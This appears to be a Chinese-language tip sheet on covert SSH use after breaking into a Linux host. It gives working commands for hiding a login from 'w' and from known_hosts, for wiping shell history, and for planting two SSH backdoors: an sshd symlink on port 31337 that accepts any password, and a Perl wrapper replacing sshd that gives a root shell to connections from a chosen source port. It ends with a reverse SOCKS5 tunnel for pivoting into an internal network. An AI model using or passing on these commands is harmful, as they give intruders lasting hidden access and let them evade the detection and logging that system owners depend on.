我一般先这么登录,不让对方执行w的时候看到我

ssh -T [email protected] bin/sh -i

还有一个技巧:远程登录时防止被记录到knowhosts文件(默认为~/.ssh/knowhosts)

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i

远程登录SSH后第一件事

unset HISTFILE;export HISTFILE=;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace

常见的两种方法建立SSH后门

1.后门端口为31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆

mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

2.使用源端口31337登录,就可以获得SHELL,端口还是默认的SSH端口

[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

用SSH做socks5代理,并且转发到公网的IP

ssh -fND 127.0.0.1:8888 [email protected]   

做SOCKS5代理,这里需要提供一个SSH登录账号

ssh -fNR 8888:127.0.0.1:8888 [email protected]

把socks5代理反弹到你公网的SSH服务器,这里输入的是你公网SSH服务器的vpn用户的密码

最后在本地设置SOCKS5代理,127.0.0.1:8888 就能连接内网任意的服务器了。